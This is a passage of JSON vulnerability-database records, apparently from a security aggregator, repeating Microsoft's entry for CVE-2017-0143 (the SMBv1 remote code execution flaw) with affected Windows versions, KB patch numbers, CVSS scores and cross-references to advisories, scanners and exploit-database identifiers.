for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": 
"KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": 
""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", 
"msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-25T23:09:38", "differentElements": ["msAffectedSoftware"], "edition": 76}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-26T00:46:05", "history": [], "viewCount": 10, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": 
"talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "threatpost", "idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:43970", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:146236"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", 
"RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-26T00:46:05", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-26T00:46:05", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4013429", "KBMS16-110, 3187754", "KB3210720", "KB4012217", "KB3177186", "KB3213986", "KB4012216", "KB3205409", "KB4012213", "KB4012214", "KB3205401", "KB4012212", "KB4012606", "KB4012598", "KB3210721", "KB4012215", "KB3212646", "KB4013198"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": 
"KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems 
Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-26T00:46:05", "differentElements": ["msAffectedSoftware"], "edition": 77}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": 
"bdbcad436fc25396d6ee8890a5e6edb2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-28T08:53:53", "history": [], "viewCount": 10, "enchantments": 
{"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "threatpost", "idList": ["THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:43C3E019D454987EF522E299C31E9D3F"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-33895", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "rapid7community", "idList": 
["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02", "ICSMA-20-170-01"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-28T08:53:53", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-28T08:53:53", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3210720", "KBMS16-110, 3187754", "KB4012215", "KB4012212", "KB4012216", "KB3212646", "KB3205409", "KB3213986", "KB3177186", "KB4012598", "KB4012217", "KB4012606", "KB3210721", "KB4012214", "KB4013198", "KB4012213", "KB3205401", "KB4013429"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, 
{"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows 
Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", 
"kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", 